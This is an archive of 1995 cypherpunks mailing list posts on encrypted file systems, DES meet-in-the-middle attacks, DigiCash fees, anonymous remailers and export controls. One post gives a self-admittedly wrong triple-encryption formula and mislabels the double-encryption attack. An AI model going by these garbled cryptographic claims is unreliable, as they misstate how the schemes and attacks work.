Cait Clarke
Gary Glisson
Rex Heinke
Eric Hughes
Matthew Ghourdjian
Benjamin Kaminash
Barry Schrader
Vibeke Sorenson
Dhruv Khann
Jerry Kang
Peter Jaszi
Jessica Litman
David Peterson
Brian Stine
Alfred Yen
Richard Stallman
James Love
Pamela Samuelson
Jerry Berman
Shari Steele
E. Wally Van Valkenburg
Margaret Chon

Folks who want to stay with me (you should be at least dog-tolerant)
or who want help getting picked up at the airport/finding a motel/whatever
are welcome to give me a call (503 744 2713) or send E-mail.

I think there's some charge to get in (not for law students, so I haven't
been especially attentive to it) but Keith said that we can probably waive
that if folks are interested and can't pay. If that sounds like a problem,
send mail, and I'll see if I can get him to issue some Cypherpunk passes.
(The idea is to extract $ from working attorneys without scaring away 
interested non-attorneys.) 

It ought to be quite a conference. By all means, if you can make it, 
come on up (or down). 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJMtEH3YhjZY3fMNAQHSBQP/R4OdjIQIYbpcR0sloIBc+ZVeR8hzQ81w
c8o2NyKncO0P/Hthxx+peCAUwN2S7RJr8k/jNvY0ah5Qcy4lmPnhn3uBVZFeY9O4
7I+NPimj38xNjvYdnUYrQT1HuEyVknnwi1s/2VsSGCVvbfJkHOWkuc0nR8JCX1cI
sc5GsGR2zzk=
=W/r5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Sun, 29 Oct 1995 22:58:26 +0800
To: hfinney@shell.portal.com
Subject: Re:  Human ID through insecure channel
Message-ID: <9510291444.AA24504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Mon, 16 Oct 1995 13:51:27 -0700
>From: Hal <hfinney@shell.portal.com>
>Subject: Human ID through insecure channel
>
>Here is an example of the Matsumoto/Imai scheme for identifying yourself
>via a shared secret over an insecure channel, a system which is simple
>enough to be done in your head but which can withstand repeated
>observations by an adversary without being broken.


Hal,

	has this been written up someplace where I might read their
description?

	From your description of it, I have a way to break it in O(N)
samples, where N is the number of characters in the challenge string and
the factor of proportionality is strictly a function of how sure you want
to be that you have a correct break.


 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme          |
 |Trusted Information Systems, Inc.   http://www.tis.com/                   |
 |3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
 |Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
 +--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 30 Oct 1995 00:01:40 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <199510282357.XAA09892@crypto.com>
Message-ID: <m0t9Zs9-0001PkC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze enscribed thusly:
> 
> Anonymous writes:
> > >
> > >What happens to hard links?
> > >
> > >mkdir foo bar
> > >CFS_set_directory_key -directory ./foo -key foo-key
> > >CFS_set_directory_key -directory ./bar -key bar-key
> > >cp /etc/passwd ./foo/test1
> > >ln ./foo/footest ./bar/bartest
> > >cmp ./foo/footest ./bar/bartest
> > 
> > This is a serious flaw. The emperor has no clothes. People should
> > sue at&t for this shit.

	"Sue AT&T..."  For free, unsupported software?  In a remark's
from a coward hiding behind an anonymus remailer.  For a problem
that is all in his own mind!

	Give Me A Break!

> I'm not sure why I'm bothering to respond to this, but I'd hate to
> think someone might take the above message seriously and think that
> there's some kind of "serious flaw" in CFS demonstrated by this sequence
> of (hypothetical, incorrect) commands.  So here goes:

	Matt, you're responding to an annonymous twit spouting ignorant
ravings because if you didn't, some others would think this guy had something
significant to say.  It's a sad state of afairs when someone creates a
great package like CFS and then has to deal with an annoyance like this.

> What on earth are you talking about?

	You think he knows?  You give him a lot more credit than I would!

> As I pointed out in a previous message, that's not how CFS works - you
> can't link across encrypted directories.
> 
> There may be (and probably are) bugs in or attacks against CFS, but this
> isn't one of them.

	To quote one of Gary Trudeau's characters from "Doonsburry" -
"Look!  The clothes have no Empereror!"

> -matt

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mahesh Prakriya" <prakriya@gradient.cis.upenn.edu>
Date: Mon, 30 Oct 1995 01:01:22 +0800
To: cypherpunks@toad.com
Subject: ques. regd. STT
Message-ID: <199510291631.LAA24817@gradient.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi. A group of us at the U. of Penn. are doing a presentation
on STT. I would like to know if you have any suggestions for us.
 
I've taken a look at the Visa & MS home pages and have a good
amount of information on STT. 
 
I'm esp. interested in finding out about the potential weaknesses
in STT. 

thanks,
Mahesh

+-----------------------------------------------------------------------+
Work					Home
-------					-----
1717 Arch St., 3E4			1801 JFK Blvd., #512
Phila., PA 19103			Phila., PA 19103
(215)-466-5476				(215)-567-2006

Internet:	prakriya@gradient.cis.upenn.edu
		http://www.cis.upenn.edu/~prakriya/home.html

PGP fingerprint =  6A EC 5B F3 D4 33 F6 D1  4C DA 99 11 F9 D9 89 A7
+-----------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Mon, 30 Oct 1995 03:53:13 +0800
To: cypherpunks@toad.com
Subject: Austin E-Commerce Conf -- BOF?
Message-ID: <v03003803acb98456fdbf@[198.93.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


If there are any other cypherpunks-readers attending the e-commerce
conference in Austin on Monday and Tuesday, it might be fun to get
together for an impromptu BOF either at lunchtime or later in the
evening.

Email me if there is interest.

_______________________________________________________________________
Stephan Somogyi               Senior Editor               Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 07:24:03 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510292300.PAA22971@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM 10/27/95 -0400, "Josh M. Osborne" <stripes@va.pubnix.com> wrote:
> They may help spread the word about
>how foolish the ITAR is, and that is their only real value (well
>aside from entertainment).

US News & World Report, October 16, 1995, page 28, has a short
article on the shirt in their Washington Whispers column :-)
It's not totally accurate, but it talks about how the Feds oppose
export of "simple but powerful computer programs that can be used
to encrypt electronic communications.  Computer buffs and private
security experts say such restrictions are a threat to privacy -
as well as an absurd anachronism, since the programs are already
widely available.  To underscore the point, one disgruntled citizen
is now offering for sale over the Internet (http://colossus.net/
wepinsto/wshome.html) a T-shirt emblazoned with an encryption program
known as RSA" and a bit more about the shirt and issues
(and Don's refund offer to anyone arrested for wearing it)


>However I think it is a good idea to slowly approch the dividing
>line between exportable and non-exportable.  Wouldn't it be nice
>to be able to hold up the shirt and say "this is exportable", and
>then scan it & save it onto a floppy and then say "this is not"
>(assuming that a floppy of the shirt is denyed CJ) when arguing
>with someone about how arbatary the export laws are?

Obviously the next revision of the shirt should have a pocket for
the optional non-exportable floppy disk :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 07:24:14 +0800
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <199510292300.PAA22989@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:45 PM 10/20/95 +0100, "Rev. Mark Grant" <mark@unicorn.com> wrote:
>> "You have a piece of mail awaiting at our mail delivery service. The
>> originator is unknown. The title of the message is "Tentacles of Medusa
>> Must Die!" You may retrieve this message by replying to this notification
>> with the word "Yes" anywhere in the Subject field. This message will be
>> kept for 60 days and then deleted."
>
>I suspect that I could easily hack this into Mixmaster in a day or two,
>but wouldn't it open you to attacks where Anonymous Fed, say, sends
>terrorist kiddy-porn through your remailer and busts your ISP during those
>60 days for possession ? I'm not sure if it would be better or worse than
>current setups from that point of view. 

One way to deflect this attack is to encrypt the message for storage
using a symmetric-key algorithm with a randomly generated session key,
and send the session key to the recipient with the notification.
You still have 300 MB of planted kiddy-terrorist narcopornography on your
machine,
but it's encrypted and you can happily tell the judge that you _can't_
decrypt it because you don't have the key.  The Feds _could_ get the
keys by eavesdropping on your outgoing correspondence or using
your system to send the material to themselves (or a conveniently employed
child), but at least you're not storing it in plaintext.

More of a problem with this system is that it's only useful for terminal
remailers; to use it in the middle of a chain, the next remailer would
need to be configured to auto-accept such messages, or else your remailer
would need to have a list of known remailers and use direct delivery
for all mail sent to them.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Mon, 30 Oct 1995 07:46:31 +0800
To: "cypherpunks@toad.com>
Subject: Quebec Libre
Message-ID: <199510292336.PAA31401@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

Cpunx, especially offshore banking "fonts of wisdom,"

A friend asks:

> Concerning Quebec Libre, I would love to establish residence there before
the
> separation (not necessarily physical residence). Have these fonts of
wisdom
> on St. Louis and Anguilla banking anything on getting Quebec residency,
mail
> services, and bank accounts?

Any plans if Quebec secedes?

Kent
--
"Put pages for your business on the World Wide Web,  just $5 per month!" --
J. Kent Hastings --  zeus@pinsight.com -- http://www.pinsight.com/~zeus/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Oct 1995 08:48:02 +0800
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <199510300037.QAA08347@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue. 

There was a program that forged CRC checksums that came out a couple years back,
letting you create a Trojan Horse and modify it to match Unix "sum" checksums
by adding junk to the end.  I'd be extremely surprised if anyone did this
with MD5;
CRCs are invertable, and generally short enough to brute-force as well.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Mon, 30 Oct 1995 10:51:10 +0800
To: cypherpunks@toad.com
Subject: Re: S. 1284 To Amend (C) Act
Message-ID: <199510300240.SAA07345@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


"Tom Bell" <BELL@odo.law.udayton.edu wrote:

>The 9/28/95 Congression Report states that Senators Hatch and Leahy 
>have introduced a bill to amend the Copyright Act in accord with the 
>suggestions of the recent White Paper on the National Information 
>Infrastructure.  In relevant part, S. 1284:  1) makes transmission of copies a 
>type of publication (and thus potentially a means of infringing a 
>copyright); and 2) prohibits the importation, manufacture, or 
>distribution of any device the primary purpose of which is to 
>deactivate any technological protections that prevent or inhibit the 
>violation of copyrights.

What occurs to me is that PGP could be considered a "device" to obscure contents of data therby preventing the determination of a copyright violation.



(delitia)


>
>Tom W. Bell
>Assistant Professor 
>Law and Technology Program
>UD Law School
>bell@odo.law.udayton.edu
>
>PGP fingerprint:
>78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kari Laine <buster@klaine.pp.fi>
Date: Mon, 30 Oct 1995 01:06:22 +0800
To: mab@crypto.com>
Subject: RE: Hash collisions [was Re: MD5 weaknes
In-Reply-To: <1995Oct25.093455.1151.341098@smtpgate.cmp.com>
Message-ID: <MAPI.Id.0016.00617269204c61694244433830304339@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain




>I have unsubscribed from this mailing list. Please remove my name 
>from   
>your personal address lists. Thanks.
>ahg3

Sir,

your tactics to get rid of a mailing list 
is causing at least me and probably some
others a pain. To be a pain is not a 
right tactics to get rid of a list 
because you might be treated as a pain.
Hmm which would get you removed from
the list...

Anyway be nice to this person and
get rid of him.

Kari





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 30 Oct 1995 09:19:02 +0800
To: "J. Kent Hastings" <zeus@pinsight.com>
Subject: [noise] Re: Quebec Libre
In-Reply-To: <199510292336.PAA31401@chico.pinsight.com>
Message-ID: <Pine.3.89.9510291907.A27468-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 29 Oct 1995, J. Kent Hastings wrote:

> -- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --
> 
> Cpunx, especially offshore banking "fonts of wisdom,"
> A friend asks:
> > Concerning Quebec Libre, I would love to establish residence there before
> the
> > separation (not necessarily physical residence). Have these fonts of
> wisdom
> > on St. Louis and Anguilla banking anything on getting Quebec residency,
> mail
> > services, and bank accounts?
> 
> Any plans if Quebec secedes?
Canada has a tax treaty with the States. Quebec wants to US permission 
to stay within NAFTA (and the States have already stated this will not be 
automatic). Similarly the PQ also wants to stay within other Canadian 
international treaties. 

I really don't see a separate Quebec becoming even a semblance of a tax 
haven or being  a hint less friendly to US interests than it is now.
We also have very high tax rates (and a bigger debt per cap) up here, 
Quebec's being the worst of all. I do remind you that Canada (french or 
english) is practically a political extension of the States. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 30 Oct 1995 13:36:15 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510300353.AA55657@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951029210721.22281A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Mark wrote:

> 
> That doesnt make sense. If one accepts that double encryption is securer than
> single encryption, wether marginally or twice as secure, why not use it?
> 

Hi Mark -

The problem with double encryption with DES is that it's vulnerable to a 
meet-in-the-middle attack if you have known plain text. You can encrypt 
the plaintext with all possible keys and store them in a (big) table, then 
decrypt the cypher text until you get a match with one of the values in 
the table. 

Doesn't work too well on an 8Mb P90 (2^59 bytes is half a peta byte), but 
since memory capacity theoretically increases as the square of processor 
speed, the attack becomes feasible much, much, sooner than breaking a 112 
byte key.

Using 3-DES,even with only two distinct keys, makes this attack 
infeasible, as the table size becomes much to large. 2-IDEA is similarly 
safe (2^131 bytes of memory is a long way off (I wonder what the first 
version of M$ Word to need that much memory will be).

Simon
 ---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 30 Oct 1995 13:58:59 +0800
To: cypherpunks@toad.com
Subject: Important Digital Cash Question...
In-Reply-To: <199510300447.PAA19230@sweeney.cs.monash.edu.au>
Message-ID: <Pine.SOL.3.91.951029212520.22281C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Ok. So we've got Alice and Bob trading their cash back and forth, with 
Mallet trying to steal their cyber-dosh, and Eve listening to their 
conversations- this leads me to the big question:

What's the right name to use for the Banker? I've been using "Nick", 
after Nick Leeson; any other suggestions?

Simon 
---
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Mon, 30 Oct 1995 13:55:46 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <199510300544.VAA12448@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com wrote:
>While Chaum is a brilliant cryptographer, he is an incompetent businessman
>
>He has demonstrated this in numerous ways.
>
>The latest being "Cash" where the bank skims off 4% to 10% every time.
>
>No one is going to use digicash under these kinds of terms and 
>conditions.


Doesn't just about everyone do precisely this when they pay sales tax?
Every time a buck arrives or departs a hand one pays a tax yet the system (you and I)continues accepting these terms albeit painfully.


> ---------------------------------------------------------------------
>              				|  
>We have the right to defend ourselves	|   http://www.jim.com/jamesd/
>and our property, because of the kind	|  
>of animals that we are. True law	|   James A. Donald
>derives from this right, not from the	|  
>arbitrary power of the state.		|   jamesd@echeque.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Mon, 30 Oct 1995 12:15:16 +0800
To: Mark <mark@lochard.com.au>
Subject: Re: MD4-derived hash functions
In-Reply-To: <199510300353.AA55657@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951029213809.15622A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Oct 1995, Mark wrote:

> >The conclusion to take away from this is simple: double encryption
> >doesn't give you much extra security over single encryption.  Don't
> >use double encryption.
> 
> That doesnt make sense. If one accepts that double encryption is securer than
> single encryption, wether marginally or twice as secure, why not use it?

Ah yes, but the vagarities of crypto don't lend themselves to real-world 
analogies so easily. With crypto schemes, if you use double-encryption, 
you effectively halve the amount of time needed to crack them. This is 
because of the "man in the middle attack." Schneier talks about it in 
Applied Crypto, and I am sure others on this list know the technical 
details better than I.

What Schneier says has been proven to be secure is, instead, a triple 
encryption scheme. Using two different keys, it goes something like this 
(if memory serves):

	Cipertext = P1xorEK1 -> C1xorDK1 -> C2xorEK1

Where P1 is the plaintext, EK1 is encrypt key 1, and DK1 is decrypt key 1.

That doesn't look right the longer I consider it, but the basic idea is 
there. Encrypt, decrypt, then encrypt again.


"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 31 Oct 1995 11:02:49 +0800
To: cypherpunks@toad.com
Subject: Pinkerton Risk Assessment & "Security 2000"
Message-ID: <9510300619.AA11035@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been broswing through the MSN (Microsoft Network), and discovered a 
section in the "SOHO" (Small Home Owner's Guidebook) called "Partners Pages".  
In it there is a list of companies with icons which subscribers can click on to 
view these companies' business/financial-related services.

One of them is the Pinkerton Risk Assessment Service.  I opened & examined 
their several icons, and it suddenly occurred to me how useful this kind of 
on-line information could be to individuals in the new anarcho-capitalist, 
nationally-borderless world. 

Sort of in keeping with the theme which Sandy Sandfort and Duncan Frissell 
brought up with their "lectures" on "Risk" last year, as well as what I had 
said in an earlier post about people in our brave new world needing to become 
imaginative in providing for their own self-defense (seeing as how trusting the 
goverment doesn't work so well), it occurred to me that having information on 
threats to one's physical safety would be fitting for this need - like the RISK 
mailing list is for computers/software.  This kind of data would be different 
from what we can get on the regular news, which is combined with many other 
kinds of news and is very generalized, in that it deals more specifically with 
the subject.

They advertise their services as:

"... the risk assessment tool for the 21st century. If you or other members of 
your company travel internationally, the Global Risk Network  on MSN. is an 
invaluable service, keeping you informed of worldwide events, political 
turmoil, global sensitive spots, and more! Now you have direct online access to 
a wealth of exclusive Pinkerton information, all via your computer. You can 
even order hard copy reports or have customized research performed by Pinkerton 
Risk Assessment  experts, simply type in your request. Tailored for the 
individual traveler, as well as the corporate executive, our risk services give 
you several options to know the security situation anywhere."

Although their services are advertised for the corporate business traveler, it 
obviously is of use to any traveler, and particularly to the person who is in 
the location mentioned.  They have icons opening up to BBSes where they report 
on trouble spots and potential threats in a timely manner:

"The Global Risk Network provides even more detailed country data, including 
 The Daily Risk Assessment 
 Weekly Risk Assessment
 Special reports 
 Statistical analysis of significant incidents
   by country and region 
 Security tips 
 Eye on Travel "

You would think that if the NSA & other State Departments used their services, 
that they wouldn't need to poke around people's computers to better predict 
where to put added security for high honcho dignitaries or State office 
buildings.  But isn't that what the intelligence services are for?  Oh, well. 
Here, I thought, is a great service for the regular person which they can use 
to be prepared for the exigencies of life's little problems, like terrorists 
and other restive types with violence on their mind.

For any of you in the Washington, D.C. area, there will be a lecture from 
Pinkerton next week as detailed below.  If anyone from this list goes, it would 
be interesting to get a post on what they say - the section on cybersecurity 
might be of relevance to the list.

(I got this from the same location on their MSN site.):

IN COOPERATION WITH THE GEORGE WASHINGTON UNIVERSITY 
PRESENTS
SECURITY 2000 

Please join us at The George Washington University's Marvin Center on November 
9, 1995, for a seminar on topics of vital interest to security professionals. 
The seminar will highlight the opportunities and challenges of the security 
environment in China; computer crime and how it can affect your business; a 
global overview of political unrest, terrorism and crime,; and a demonstration 
of the new Pinkerton Global Risk Network on the Microsoft Network. Join us for 
the news, views and tools for ensuring your organization's security as we 
approach the 21st century.

Featuring: 
	0800-0900  China and Southeast Asia - Dan Grove, Pinkerton - Asia
	0910-1000  Cybercrime - Special Agent Jim Christy, 
		     Air Force Office of Special Investigations 
	1010-1110  Global Patterns and Trends - Hugh Barber, 
		     Pinkerton Risk Assessment Services
	1120-1220   Pinkerton Global Risk Network on the Microsoft Network
		      - Demonstrated by Frank Johns and Hugh Barber,
		        Pinkerton Risk Assessment Services
	1230-1400   Lunch - GWU Club (no charge)  

The GWU campus is just off the Foggy Bottom Metro stop, in Washington D.C., 
near the U.S. Department of State, where the annual OSAC conference will take 
place on November 7-8.  

There is no fee for the seminar, however, seating is limited. Please RSVP by 
calling Pinkerton Risk Assessment Services at (703) 525-6111, Fax (703) 
525-2454 or via e-mail at: pras@access.digex.net
--------------

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 30 Oct 1995 12:41:05 +0800
To: cypherpunks@toad.com
Subject: QUF_jpg
Message-ID: <199510300430.XAA01209@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We have scanned "Quantum Computation's" seven formulae 
   and six figures as JPEG graphics files and will send for a 
plea:


   quf1.jpg -- Formulae 1-7; 32 kb.
   quf2.jpg -- Figures 1 and 2; 72 kb.
   quf3.jpg -- Figures 3 and 4; 95 kb.
   quf4.jpg -- Figures 5 and 6; 72 kb.


   Or, we will mash'em up .TIF, .PCX, .GIF, or tire-smeared
   pigeon.


   QUF_jpg  (4-part package, or items selected)


   [or *_tif, *_pcx, *_gif, *_tsp]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 30 Oct 1995 15:30:30 +0800
To: cypherpunks@toad.com
Subject: Re: Digicash will not fly (not)
Message-ID: <acb9bb9700021004f83d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:41 AM 10/30/95, M. F. (Pat wrote:
>"James A. Donald" <jamesd@echeque.com wrote:
>>While Chaum is a brilliant cryptographer, he is an incompetent businessman
>>
>>He has demonstrated this in numerous ways.
>>
>>The latest being "Cash" where the bank skims off 4% to 10% every time.
>>
>>No one is going to use digicash under these kinds of terms and
>>conditions.
>
>
>Doesn't just about everyone do precisely this when they pay sales tax?
>Every time a buck arrives or departs a hand one pays a tax yet the system
>(you and I)continues accepting these terms albeit painfully.

Many types of business dealings are exempt from sales tax, through
arrangements for resales.

I don't know if the "skims off 4% to 10% every time" point accurately
describes how the current Digicash model works, but certainly this will not
fly as a long term rate. So many monetary transactions happen in the course
of business that even a 4% fee _per transaction_ would rapidly wipe out
most of the value.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Mon, 30 Oct 1995 15:28:29 +0800
To: "M. F. (Pat) Sprague" <msprague@owens.ridgecrest.ca.us>
Subject: Re: Digicash will not fly (not)
In-Reply-To: <199510300544.VAA12448@owens.ridgecrest.ca.us>
Message-ID: <Pine.SUN.3.91.951030021540.906A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 29 Oct 1995, M. F. (Pat) Sprague wrote:

> "James A. Donald" <jamesd@echeque.com wrote:
> >While Chaum is a brilliant cryptographer, he is an incompetent businessman
> >
> >He has demonstrated this in numerous ways.
> >
> >The latest being "Cash" where the bank skims off 4% to 10% every time.
> >
> >No one is going to use digicash under these kinds of terms and 
> >conditions.
> 
> 
> Doesn't just about everyone do precisely this when they pay sales tax?
> Every time a buck arrives or departs a hand one pays a tax yet the system (you and I)continues accepting these terms albeit painfully.



Unfortunately, now with digicash purchases you pay BOTH the sales tax AND 
the banks (extortionate) cut.


> 
> 
> > ---------------------------------------------------------------------
> >              				|  
> >We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> >and our property, because of the kind	|  
> >of animals that we are. True law	|   James A. Donald
> >derives from this right, not from the	|  
> >arbitrary power of the state.		|   jamesd@echeque.com
> 
> 
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 30 Oct 1995 19:29:46 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Important Digital Cash Question...
Message-ID: <v02120d03acba633daa0e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>What's the right name to use for the Banker? I've been using "Nick",
>after Nick Leeson; any other suggestions?

How about "Pip", J. Pierpont Morgan's childhood nickname. OK, OK, I'll sit
down now...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 30 Oct 1995 23:06:55 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510301450.GAA23506@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
